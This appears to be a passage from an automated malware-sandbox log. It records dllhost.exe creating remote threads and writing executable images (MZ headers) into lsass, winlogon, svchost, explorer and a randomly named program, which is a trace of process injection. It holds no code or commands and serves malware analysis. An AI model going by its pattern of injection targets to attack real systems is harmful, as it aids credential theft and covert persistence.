Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 595A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30AF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 80B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5AEE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CF52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BCD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BF02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 6F092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED7F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD8E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF9E2EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D2660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D9540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AF660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
